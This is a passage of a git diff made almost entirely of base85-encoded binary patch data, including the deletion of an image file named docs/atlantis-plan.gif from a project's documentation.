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

diff --git a/docs/atlantis-plan.gif b/docs/atlantis-plan.gif
deleted file mode 100644
index ec106133d981f04471bbd23eb35919a734eca3df..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 1090754
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
